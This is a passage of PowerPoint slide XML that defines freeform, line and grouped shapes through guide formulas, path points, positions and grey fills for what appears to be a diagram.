                      <a:pt x="895" y="23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43" name="Freeform 4381"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3853" y="1108"/>
                <a:ext cx="77" cy="21"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 893 w 893"/>
                  <a:gd name="T1" fmla="*/ 239 h 239"/>
                  <a:gd name="T2" fmla="*/ 0 w 893"/>
                  <a:gd name="T3" fmla="*/ 0 h 239"/>
                  <a:gd name="T4" fmla="*/ 893 w 893"/>
                  <a:gd name="T5" fmla="*/ 239 h 239"/>
                  <a:gd name="T6" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T7" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T9" fmla="*/ 0 w 893"/>
                  <a:gd name="T10" fmla="*/ 0 h 239"/>
                  <a:gd name="T11" fmla="*/ 893 w 893"/>
                  <a:gd name="T12" fmla="*/ 239 h 23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93" h="239">
                    <a:moveTo>
                      <a:pt x="893" y="239"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="893" y="23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44" name="Line 4382"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1" flipV="1">
                <a:off x="3853" y="1108"/>
                <a:ext cx="77" cy="2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45" name="Freeform 4383"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3853" y="1124"/>
                <a:ext cx="77" cy="20"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 893 w 893"/>
                  <a:gd name="T1" fmla="*/ 239 h 239"/>
                  <a:gd name="T2" fmla="*/ 0 w 893"/>
                  <a:gd name="T3" fmla="*/ 0 h 239"/>
                  <a:gd name="T4" fmla="*/ 893 w 893"/>
                  <a:gd name="T5" fmla="*/ 239 h 239"/>
                  <a:gd name="T6" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T7" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T9" fmla="*/ 0 w 893"/>
                  <a:gd name="T10" fmla="*/ 0 h 239"/>
                  <a:gd name="T11" fmla="*/ 893 w 893"/>
                  <a:gd name="T12" fmla="*/ 239 h 23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93" h="239">
                    <a:moveTo>
                      <a:pt x="893" y="239"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="893" y="23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46" name="Line 4384"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1" flipV="1">
                <a:off x="3853" y="1124"/>
                <a:ext cx="77" cy="2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47" name="Freeform 4385"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3853" y="1139"/>
                <a:ext cx="77" cy="21"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 893 w 893"/>
                  <a:gd name="T1" fmla="*/ 239 h 239"/>
                  <a:gd name="T2" fmla="*/ 0 w 893"/>
                  <a:gd name="T3" fmla="*/ 0 h 239"/>
                  <a:gd name="T4" fmla="*/ 893 w 893"/>
                  <a:gd name="T5" fmla="*/ 239 h 239"/>
                  <a:gd name="T6" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T7" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T9" fmla="*/ 0 w 893"/>
                  <a:gd name="T10" fmla="*/ 0 h 239"/>
                  <a:gd name="T11" fmla="*/ 893 w 893"/>
                  <a:gd name="T12" fmla="*/ 239 h 23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93" h="239">
                    <a:moveTo>
                      <a:pt x="893" y="239"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="893" y="23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48" name="Line 4386"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1" flipV="1">
                <a:off x="3853" y="1139"/>
                <a:ext cx="77" cy="2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49" name="Freeform 4387"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3853" y="1155"/>
                <a:ext cx="77" cy="20"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 893 w 893"/>
                  <a:gd name="T1" fmla="*/ 239 h 239"/>
                  <a:gd name="T2" fmla="*/ 0 w 893"/>
                  <a:gd name="T3" fmla="*/ 0 h 239"/>
                  <a:gd name="T4" fmla="*/ 893 w 893"/>
                  <a:gd name="T5" fmla="*/ 239 h 239"/>
                  <a:gd name="T6" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T7" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T9" fmla="*/ 0 w 893"/>
                  <a:gd name="T10" fmla="*/ 0 h 239"/>
                  <a:gd name="T11" fmla="*/ 893 w 893"/>
                  <a:gd name="T12" fmla="*/ 239 h 23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93" h="239">
                    <a:moveTo>
                      <a:pt x="893" y="239"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="893" y="23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50" name="Line 4388"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1" flipV="1">
                <a:off x="3853" y="1155"/>
                <a:ext cx="77" cy="2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51" name="Line 4389"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3883" y="1100"/>
                <a:ext cx="0" cy="7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52" name="Line 4390"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3899" y="1104"/>
                <a:ext cx="0" cy="7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53" name="Line 4391"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3868" y="1096"/>
                <a:ext cx="0" cy="7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54" name="Line 4392"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3914" y="1108"/>
                <a:ext cx="0" cy="7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55" name="Freeform 4393"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4023" y="1257"/>
                <a:ext cx="83" cy="45"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 975 w 975"/>
                  <a:gd name="T1" fmla="*/ 257 h 515"/>
                  <a:gd name="T2" fmla="*/ 0 w 975"/>
                  <a:gd name="T3" fmla="*/ 0 h 515"/>
                  <a:gd name="T4" fmla="*/ 0 w 975"/>
                  <a:gd name="T5" fmla="*/ 515 h 515"/>
                  <a:gd name="T6" fmla="*/ 975 w 975"/>
                  <a:gd name="T7" fmla="*/ 257 h 5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75"/>
                  <a:gd name="T13" fmla="*/ 0 h 515"/>
                  <a:gd name="T14" fmla="*/ 975 w 975"/>
                  <a:gd name="T15" fmla="*/ 515 h 5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75" h="515">
                    <a:moveTo>
                      <a:pt x="975" y="257"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="515"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="975" y="257"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="B2B2B2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56" name="Freeform 4394"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4023" y="1098"/>
                <a:ext cx="83" cy="181"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 975 w 975"/>
                  <a:gd name="T1" fmla="*/ 2124 h 2124"/>
                  <a:gd name="T2" fmla="*/ 975 w 975"/>
                  <a:gd name="T3" fmla="*/ 0 h 2124"/>
                  <a:gd name="T4" fmla="*/ 0 w 975"/>
                  <a:gd name="T5" fmla="*/ 258 h 2124"/>
                  <a:gd name="T6" fmla="*/ 0 w 975"/>
                  <a:gd name="T7" fmla="*/ 1867 h 2124"/>
                  <a:gd name="T8" fmla="*/ 975 w 975"/>
                  <a:gd name="T9" fmla="*/ 2124 h 2124"/>
                  <a:gd name="T10" fmla="*/ 975 w 975"/>
                  <a:gd name="T11" fmla="*/ 2124 h 21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75"/>
                  <a:gd name="T19" fmla="*/ 0 h 2124"/>
                  <a:gd name="T20" fmla="*/ 975 w 975"/>
                  <a:gd name="T21" fmla="*/ 2124 h 212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75" h="2124">
                    <a:moveTo>
                      <a:pt x="975" y="2124"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="975" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1867"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="975" y="2124"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="5F5F5F"/>
              </a:soli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57" name="Freeform 4395"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4133" y="1228"/>
                <a:ext cx="83" cy="44"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 976 w 976"/>
                  <a:gd name="T1" fmla="*/ 257 h 515"/>
                  <a:gd name="T2" fmla="*/ 0 w 976"/>
                  <a:gd name="T3" fmla="*/ 0 h 515"/>
                  <a:gd name="T4" fmla="*/ 0 w 976"/>
                  <a:gd name="T5" fmla="*/ 515 h 515"/>
                  <a:gd name="T6" fmla="*/ 976 w 976"/>
                  <a:gd name="T7" fmla="*/ 257 h 5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76"/>
                  <a:gd name="T13" fmla="*/ 0 h 515"/>
                  <a:gd name="T14" fmla="*/ 976 w 976"/>
                  <a:gd name="T15" fmla="*/ 515 h 5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76" h="515">
                    <a:moveTo>
                      <a:pt x="976" y="257"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="515"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="976" y="257"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="B2B2B2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58" name="Freeform 4396"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4133" y="1068"/>
                <a:ext cx="83" cy="182"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 976 w 976"/>
                  <a:gd name="T1" fmla="*/ 2121 h 2121"/>
                  <a:gd name="T2" fmla="*/ 976 w 976"/>
                  <a:gd name="T3" fmla="*/ 0 h 2121"/>
                  <a:gd name="T4" fmla="*/ 0 w 976"/>
                  <a:gd name="T5" fmla="*/ 255 h 2121"/>
                  <a:gd name="T6" fmla="*/ 0 w 976"/>
                  <a:gd name="T7" fmla="*/ 1864 h 2121"/>
                  <a:gd name="T8" fmla="*/ 976 w 976"/>
                  <a:gd name="T9" fmla="*/ 2121 h 2121"/>
                  <a:gd name="T10" fmla="*/ 976 w 976"/>
                  <a:gd name="T11" fmla="*/ 2121 h 2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76"/>
                  <a:gd name="T19" fmla="*/ 0 h 2121"/>
                  <a:gd name="T20" fmla="*/ 976 w 976"/>
                  <a:gd name="T21" fmla="*/ 2121 h 21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76" h="2121">
                    <a:moveTo>
                      <a:pt x="976" y="2121"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="976" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="255"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1864"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="976" y="2121"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="5F5F5F"/>
              </a:soli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59" name="Freeform 4397"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4241" y="1199"/>
                <a:ext cx="84" cy="44"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 973 w 973"/>
                  <a:gd name="T1" fmla="*/ 257 h 515"/>
                  <a:gd name="T2" fmla="*/ 0 w 973"/>
                  <a:gd name="T3" fmla="*/ 0 h 515"/>
                  <a:gd name="T4" fmla="*/ 0 w 973"/>
                  <a:gd name="T5" fmla="*/ 515 h 515"/>
                  <a:gd name="T6" fmla="*/ 973 w 973"/>
                  <a:gd name="T7" fmla="*/ 257 h 5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73"/>
                  <a:gd name="T13" fmla="*/ 0 h 515"/>
                  <a:gd name="T14" fmla="*/ 973 w 973"/>
                  <a:gd name="T15" fmla="*/ 515 h 5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73" h="515">
                    <a:moveTo>
                      <a:pt x="973" y="257"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="515"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="973" y="257"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="B2B2B2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0" name="Freeform 4398"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4241" y="1039"/>
                <a:ext cx="84" cy="182"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 973 w 973"/>
                  <a:gd name="T1" fmla="*/ 2121 h 2121"/>
                  <a:gd name="T2" fmla="*/ 973 w 973"/>
                  <a:gd name="T3" fmla="*/ 0 h 2121"/>
                  <a:gd name="T4" fmla="*/ 0 w 973"/>
                  <a:gd name="T5" fmla="*/ 255 h 2121"/>
                  <a:gd name="T6" fmla="*/ 0 w 973"/>
                  <a:gd name="T7" fmla="*/ 1864 h 2121"/>
                  <a:gd name="T8" fmla="*/ 973 w 973"/>
                  <a:gd name="T9" fmla="*/ 2121 h 2121"/>
                  <a:gd name="T10" fmla="*/ 973 w 973"/>
                  <a:gd name="T11" fmla="*/ 2121 h 2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73"/>
                  <a:gd name="T19" fmla="*/ 0 h 2121"/>
                  <a:gd name="T20" fmla="*/ 973 w 973"/>
                  <a:gd name="T21" fmla="*/ 2121 h 21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73" h="2121">
                    <a:moveTo>
                      <a:pt x="973" y="2121"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="973" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="255"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1864"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="973" y="2121"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="5F5F5F"/>
              </a:solidFill>
              <a:ln w="63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1" name="Freeform 4399"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4208" y="928"/>
                <a:ext cx="56" cy="71"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 657 w 657"/>
                  <a:gd name="T1" fmla="*/ 0 h 829"/>
                  <a:gd name="T2" fmla="*/ 657 w 657"/>
                  <a:gd name="T3" fmla="*/ 654 h 829"/>
                  <a:gd name="T4" fmla="*/ 0 w 657"/>
                  <a:gd name="T5" fmla="*/ 829 h 829"/>
                  <a:gd name="T6" fmla="*/ 0 w 657"/>
                  <a:gd name="T7" fmla="*/ 177 h 829"/>
                  <a:gd name="T8" fmla="*/ 657 w 657"/>
                  <a:gd name="T9" fmla="*/ 0 h 8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57"/>
                  <a:gd name="T16" fmla="*/ 0 h 829"/>
                  <a:gd name="T17" fmla="*/ 657 w 657"/>
                  <a:gd name="T18" fmla="*/ 829 h 8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57" h="829">
                    <a:moveTo>
                      <a:pt x="657" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="657" y="654"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="829"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65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2" name="Freeform 4400"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4211" y="932"/>
                <a:ext cx="49" cy="63"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 569 w 569"/>
                  <a:gd name="T1" fmla="*/ 0 h 730"/>
                  <a:gd name="T2" fmla="*/ 569 w 569"/>
                  <a:gd name="T3" fmla="*/ 581 h 730"/>
                  <a:gd name="T4" fmla="*/ 0 w 569"/>
                  <a:gd name="T5" fmla="*/ 730 h 730"/>
                  <a:gd name="T6" fmla="*/ 0 w 569"/>
                  <a:gd name="T7" fmla="*/ 149 h 730"/>
                  <a:gd name="T8" fmla="*/ 569 w 569"/>
                  <a:gd name="T9" fmla="*/ 0 h 7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9"/>
                  <a:gd name="T16" fmla="*/ 0 h 730"/>
                  <a:gd name="T17" fmla="*/ 569 w 569"/>
                  <a:gd name="T18" fmla="*/ 730 h 7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9" h="730">
                    <a:moveTo>
                      <a:pt x="569" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="569" y="581"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="730"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="569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3" name="Freeform 4401"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4079" y="963"/>
                <a:ext cx="56" cy="71"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 655 w 655"/>
                  <a:gd name="T1" fmla="*/ 0 h 829"/>
                  <a:gd name="T2" fmla="*/ 655 w 655"/>
                  <a:gd name="T3" fmla="*/ 654 h 829"/>
                  <a:gd name="T4" fmla="*/ 0 w 655"/>
                  <a:gd name="T5" fmla="*/ 829 h 829"/>
                  <a:gd name="T6" fmla="*/ 0 w 655"/>
                  <a:gd name="T7" fmla="*/ 177 h 829"/>
                  <a:gd name="T8" fmla="*/ 655 w 655"/>
                  <a:gd name="T9" fmla="*/ 0 h 8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55"/>
                  <a:gd name="T16" fmla="*/ 0 h 829"/>
                  <a:gd name="T17" fmla="*/ 655 w 655"/>
                  <a:gd name="T18" fmla="*/ 829 h 8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55" h="829">
                    <a:moveTo>
                      <a:pt x="655" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="655" y="654"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="829"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="655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4" name="Freeform 4402"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4083" y="967"/>
                <a:ext cx="48" cy="63"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 567 w 567"/>
                  <a:gd name="T1" fmla="*/ 0 h 730"/>
                  <a:gd name="T2" fmla="*/ 567 w 567"/>
                  <a:gd name="T3" fmla="*/ 581 h 730"/>
                  <a:gd name="T4" fmla="*/ 0 w 567"/>
                  <a:gd name="T5" fmla="*/ 730 h 730"/>
                  <a:gd name="T6" fmla="*/ 0 w 567"/>
                  <a:gd name="T7" fmla="*/ 148 h 730"/>
                  <a:gd name="T8" fmla="*/ 567 w 567"/>
                  <a:gd name="T9" fmla="*/ 0 h 7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7"/>
                  <a:gd name="T16" fmla="*/ 0 h 730"/>
                  <a:gd name="T17" fmla="*/ 567 w 567"/>
                  <a:gd name="T18" fmla="*/ 730 h 7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7" h="730">
                    <a:moveTo>
                      <a:pt x="567" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="567" y="581"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="730"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56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665" name="Group 1656"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2882621" y="2164559"/>
              <a:ext cx="699924" cy="436390"/>
              <a:chOff x="-6154" y="-7787"/>
              <a:chExt cx="8423" cy="5270"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="666" name="Freeform 1657"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-5996" y="-4792"/>
                <a:ext cx="867" cy="636"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 118 w 867"/>
                  <a:gd name="T1" fmla="*/ 636 h 636"/>
                  <a:gd name="T2" fmla="*/ 529 w 867"/>
                  <a:gd name="T3" fmla="*/ 506 h 636"/>
                  <a:gd name="T4" fmla="*/ 867 w 867"/>
                  <a:gd name="T5" fmla="*/ 168 h 636"/>
                  <a:gd name="T6" fmla="*/ 276 w 867"/>
                  <a:gd name="T7" fmla="*/ 0 h 636"/>
                  <a:gd name="T8" fmla="*/ 0 w 867"/>
                  <a:gd name="T9" fmla="*/ 298 h 636"/>
                  <a:gd name="T10" fmla="*/ 118 w 867"/>
                  <a:gd name="T11" fmla="*/ 636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67" h="636">
                    <a:moveTo>
                      <a:pt x="118" y="636"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="529" y="506"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="867" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="276" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="63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7" name="Freeform 1658"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-5632" y="-4624"/>
                <a:ext cx="942" cy="1033"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 318 w 399"/>
                  <a:gd name="T1" fmla="*/ 126 h 437"/>
                  <a:gd name="T2" fmla="*/ 87 w 399"/>
                  <a:gd name="T3" fmla="*/ 27 h 437"/>
                  <a:gd name="T4" fmla="*/ 87 w 399"/>
                  <a:gd name="T5" fmla="*/ 27 h 437"/>
                  <a:gd name="T6" fmla="*/ 23 w 399"/>
                  <a:gd name="T7" fmla="*/ 44 h 437"/>
                  <a:gd name="T8" fmla="*/ 36 w 399"/>
                  <a:gd name="T9" fmla="*/ 72 h 437"/>
                  <a:gd name="T10" fmla="*/ 77 w 399"/>
                  <a:gd name="T11" fmla="*/ 310 h 437"/>
                  <a:gd name="T12" fmla="*/ 189 w 399"/>
                  <a:gd name="T13" fmla="*/ 401 h 437"/>
                  <a:gd name="T14" fmla="*/ 205 w 399"/>
                  <a:gd name="T15" fmla="*/ 437 h 437"/>
                  <a:gd name="T16" fmla="*/ 291 w 399"/>
                  <a:gd name="T17" fmla="*/ 414 h 437"/>
                  <a:gd name="T18" fmla="*/ 291 w 399"/>
                  <a:gd name="T19" fmla="*/ 414 h 437"/>
                  <a:gd name="T20" fmla="*/ 332 w 399"/>
                  <a:gd name="T21" fmla="*/ 395 h 437"/>
                  <a:gd name="T22" fmla="*/ 318 w 399"/>
                  <a:gd name="T23" fmla="*/ 126 h 4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9" h="437">
                    <a:moveTo>
                      <a:pt x="318" y="126"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="252" y="40"/>
                      <a:pt x="155" y="0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0" y="131"/>
                      <a:pt x="15" y="228"/>
                      <a:pt x="77" y="310"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="109" y="352"/>
                      <a:pt x="149" y="383"/>
                      <a:pt x="189" y="401"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="205" y="437"/>
                      <a:pt x="205" y="437"/>
                      <a:pt x="205" y="437"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="291" y="414"/>
                      <a:pt x="291" y="414"/>
                      <a:pt x="291" y="414"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="291" y="414"/>
                      <a:pt x="291" y="414"/>
                      <a:pt x="291" y="414"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="306" y="411"/>
                      <a:pt x="320" y="404"/>
                      <a:pt x="332" y="395"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="399" y="345"/>
                      <a:pt x="392" y="224"/>
                      <a:pt x="318" y="12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8" name="Freeform 1659"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-5838" y="-4593"/>
                <a:ext cx="950" cy="1075"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 335 w 402"/>
                  <a:gd name="T1" fmla="*/ 405 h 455"/>
                  <a:gd name="T2" fmla="*/ 80 w 402"/>
                  <a:gd name="T3" fmla="*/ 319 h 455"/>
                  <a:gd name="T4" fmla="*/ 66 w 402"/>
                  <a:gd name="T5" fmla="*/ 50 h 455"/>
                  <a:gd name="T6" fmla="*/ 321 w 402"/>
                  <a:gd name="T7" fmla="*/ 136 h 455"/>
                  <a:gd name="T8" fmla="*/ 335 w 402"/>
                  <a:gd name="T9" fmla="*/ 405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2" h="455">
                    <a:moveTo>
                      <a:pt x="335" y="405"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="269" y="455"/>
                      <a:pt x="154" y="417"/>
                      <a:pt x="80" y="319"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="221"/>
                      <a:pt x="0" y="101"/>
                      <a:pt x="66" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
